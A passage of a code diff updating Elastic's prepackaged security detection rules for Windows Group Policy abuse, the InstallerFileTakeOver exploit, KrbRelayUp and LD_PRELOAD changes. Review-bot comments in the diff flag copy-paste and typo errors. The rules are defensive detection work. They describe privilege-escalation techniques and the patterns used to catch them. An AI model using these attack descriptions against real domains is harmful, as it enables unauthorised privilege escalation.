Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", 
 "tags": [
 "Elastic",
@@ -62,5 +100,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json
index 2e77e602e2e9f..6923d779d8dce 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_privileged_groups.json
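Review bot: The retained `note` in the new `"note"` line still carries text belonging to the sibling Scheduled Task rule: its heading reads `### Investigating Scheduled Task Execution at Scale via GPO` and an investigation step says to retrieve the `ScheduledTasks.xml` file, whereas this rule ("Startup/Logon Script added to Group Policy Object") is about changes to `scripts.ini`/`psscripts.ini`, as the note's own first paragraph and the query's `RelativeTargetName` terms show; the heading should name this rule and the step should point at the script INI files. The new `setup` value also repeats a typo, `with with Advanced Audit Configuration`, twice here and once more in the `setup` added to privilege_escalation_group_policy_privileged_groups.json in the next file section. Since `setup` is introduced by this commit, correcting the wording now avoids carrying the typo into the new field and its future versions.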
@@ -10,14 +10,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "Group Policy Abuse for Privilege Addition", - "note": "## Triage and analysis\n\n### Investigating Group Policy Abuse for Privilege Addition\n\nGroup Policy Objects (GPOs) can be used to add rights and/or modify Group Membership on GPOs by changing the contents of an INF\nfile named GptTmpl.inf, which is responsible for storing every setting under the Security Settings container in the GPO.\nThis file is unique for each GPO, and only exists if the GPO contains security settings.\nExample Path: \"\\\\DC.com\\SysVol\\DC.com\\Policies\\{PolicyGUID}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `GptTmpl.inf` file, and under the `Privilege Rights` section, look for potentially\ndangerous high privileges, for example: SeTakeOwnershipPrivilege, SeEnableDelegationPrivilege, etc.\n- Inspect the user security identifiers (SIDs) associated with these privileges, and if they should have these privileges.\n\n### False positive analysis\n\n- Inspect whether the user that has done the modifications should be allowed to. 
The user name can be found in the\n`winlog.event_data.SubjectUserName` field.\n\n### Related rules\n\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n\n## Config\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n", - "query": "event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"gPCMachineExtensionNames\" and \nwinlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*)\n", + "note": "## Triage and analysis\n\n### Investigating Group Policy Abuse for Privilege Addition\n\nGroup Policy Objects (GPOs) can be used to add rights and/or modify Group Membership on GPOs by changing the contents of an INF\nfile named GptTmpl.inf, which is responsible for storing every setting under the Security Settings container in the GPO.\nThis file is unique for each GPO, and only exists if the GPO contains security settings.\nExample Path: \"\\\\DC.com\\SysVol\\DC.com\\Policies\\{PolicyGUID}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator 
is authorized to perform this operation.\n- Retrieve the contents of the `GptTmpl.inf` file, and under the `Privilege Rights` section, look for potentially\ndangerous high privileges, for example: SeTakeOwnershipPrivilege, SeEnableDelegationPrivilege, etc.\n- Inspect the user security identifiers (SIDs) associated with these privileges, and if they should have these privileges.\n\n### False positive analysis\n\n- Inspect whether the user that has done the modifications should be allowed to. The user name can be found in the\n`winlog.event_data.SubjectUserName` field.\n\n### Related rules\n\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.", + "query": "event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"gPCMachineExtensionNames\" and\nwinlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", "https://labs.f-secure.com/tools/sharpgpoabuse" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", + "setup": "The 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement 
the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json index 34e4c0610e1a9..49b6277a81a60 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_scheduled_task.json 
@@ -10,8 +10,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "Scheduled Task Execution at Scale via GPO", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled\nby a given GPO. This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml`\nfile.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## 
Config\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nObject Access > \nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n", - "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and \n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*)) \nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled\nby a given GPO. 
This is done by changing the contents of the `\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml`\nfile.\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is allowed and done under change management, and if the execution is legitimate.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scheduled tasks attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "(event.code: \"5136\" and winlog.event_data.AttributeLDAPDisplayName:(\"gPCMachineExtensionNames\" or \"gPCUserExtensionNames\") and\n winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*))\nor\n(event.code: \"5145\" and winlog.event_data.ShareName: \"\\\\\\\\*\\\\SYSVOL\" and 
winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and\n (message: WriteData or winlog.event_data.AccessList: *%%4417*))\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", 
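Review bot: The rewritten note's remediation step still says `- Remove the script from the GPO.` although this rule is about scheduled tasks placed in `ScheduledTasks.xml`; it should read `- Remove the scheduled task from the GPO.` so responders are pointed at the right GPP artifact. In the same note the investigation step "check the `` and `` XML tags" names no tags at all — presumably the element names (the `<Command>` and `<Arguments>` elements of a GPP scheduled-task entry) were lost, so they should be restored or the step rewritten as "check the command and argument elements of each task for malicious binaries". Both strings are carried over verbatim from the removed note, so this is pre-existing text, but the commit rewrites the line and is the natural place to fix it.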
@@ -19,8 +19,46 @@ "https://twitter.com/menasec1/status/1106899890377052160", "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_gpo_scheduledtasks.yml" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ShareName", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "15a8ba77-1c13-4274-88fe-6bd14133861e", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -68,5 +106,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } 
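Review bot: The new `setup` string repeats a word in both paragraphs (`Steps to implement the logging policy with with Advanced Audit Configuration`); drop one `with` in each, since this text is shown to users as the rule's setup guide. The same duplicated phrase appears in the `setup` added to the previous rule file in this commit (rule b9554892), so it is worth a search across the prepackaged rules rather than a one-off fix. Separately, `message` is declared `match_only_text` in `required_fields` while the query does a free-text `message: WriteData` match; that is consistent, but the `winlog.event_data.AccessList: *%%4417*` clause is the precise condition and the `message` clause presumably exists only for data sources that lack `AccessList` — a short comment in the query saying so would help the next maintainer.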
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json index dfcba2aa7e546..ce3a23b423b4e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_installertakeover.json 
@@ -12,13 +12,46 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via InstallerFileTakeOver", - "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an\nunprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself\nto the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked),\nwhich is outside the scope of this rule.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Verify whether 
a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where event.type == \"start\" and \n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and \n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and \n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\")) \n )\n", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an\nunprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself\nto the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked),\nwhich is outside the scope of this rule.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during 
triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "/* This rule is compatible with both Sysmon and Elastic Endpoint */\n\nprocess where event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n )\n", "references": [ "https://github.com/klinix5/InstallerFileTakeOver" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback 
for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json index 7cd11fbf31640..ba74a93e1fda4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_service_creation.json @@ -18,6 +18,53 @@ "https://github.com/cube0x0/KrbRelay", "https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + }, + { + "ecs": false, + "name": "winlog.event_data.AuthenticationPackageName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "e4e31051-ee01-4307-a6ee-b21b186958f4", "severity": "high", @@ -69,5 +116,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } 
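Review bot: `required_fields` lists both `process.Ext.token.integrity_level_name` and `winlog.event_data.IntegrityLevel` as required, yet the query reads each with the `?` optional-field prefix and only needs one of them (presumably the former from Elastic Endpoint and the latter from Sysmon/winlogbeat, per the query's own "compatible with both" comment). If `required_fields` is consumed as "fields that must be present", this overstates the requirement for either data source; consider noting in `setup` that only one of the two integrity-level fields is needed for a given index. The `type` mismatch between the two entries (`unknown` vs `keyword`) looks intentional for non-ECS fields but is worth confirming against the integration mapping. Also, the note's `escalate privileges to SYSTEM/NT AUTHORITY` reads backwards; the account is `NT AUTHORITY\SYSTEM`.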
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_suspicious_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_suspicious_logon.json deleted file mode 100644 index 05f7e52ade03c..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_krbrelayup_suspicious_logon.json +++ /dev/null 
@@ -1,72 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Potential Privilege Escalation via Local Kerberos Relay over LDAP", - "query": "authentication where\n\n /* event 4624 need to be logged */\n event.action == \"logged-in\" and event.outcome == \"success\" and\n\n /* authenticate locally via relayed kerberos ticket */\n winlog.event_data.AuthenticationPackageName : \"Kerberos\" and winlog.logon.type == \"Network\" and\n source.ip == \"127.0.0.1\" and source.port > 0 and\n\n /* Impersonate Administrator user via S4U2Self service ticket */\n winlog.event_data.TargetUserSid : \"S-1-5-21-*-500\"\n", - "references": [ - "https://github.com/Dec0ne/KrbRelayUp", - "https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html", - "https://github.com/cube0x0/KrbRelay" - ], - "risk_score": 73, - "rule_id": "3605a013-6f0c-4f7d-88a5-326f5be262ec", - "severity": "high", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - "Privilege Escalation", - "Credential Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1548", - "name": "Abuse Elevation Control Mechanism", - "reference": "https://attack.mitre.org/techniques/T1548/", - "subtechnique": [ - { - "id": "T1548.002", - "name": "Bypass User Account Control", - "reference": 
"https://attack.mitre.org/techniques/T1548/002/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1558", - "name": "Steal or Forge Kerberos Tickets", - "reference": "https://attack.mitre.org/techniques/T1558/" - } - ] - } - ], - "type": "eql", - "version": 1 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json index 45644e9a4f021..1e681c7108c6e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_ld_preload_shared_object_modif.json @@ -15,6 +15,23 @@ "references": [ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f", "severity": "medium", @@ -51,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_linux_strace_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_linux_strace_activity.json deleted file mode 100644 index a649bcd3ac487..0000000000000 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_linux_strace_activity.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Strace is a useful diagnostic, instructional, and debugging tool. This rule identifies a privileged context execution of strace which can be used to escape restrictive environments by instantiating a shell in order to elevate privileges or move laterally.", - "false_positives": [ - "Strace is a dual-use tool that can be used for benign or malicious activity. Some normal use of this command may originate from developers or SREs engaged in debugging or system call tracing." - ], - "from": "now-9m", - "index": [ - "auditbeat-*", - "logs-endpoint.events.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Strace Process Activity", - "query": "event.category:process and event.type:(start or process_started) and process.name:strace\n", - "references": [ - "https://en.wikipedia.org/wiki/Strace" - ], - "risk_score": 21, - "rule_id": "d6450d4e-81c6-46a3-bd94-079886318ed5", - "severity": "low", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Privilege Escalation" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1068", - "name": "Exploitation for Privilege Escalation", - "reference": "https://attack.mitre.org/techniques/T1068/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 8 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_local_user_added_to_admin.json 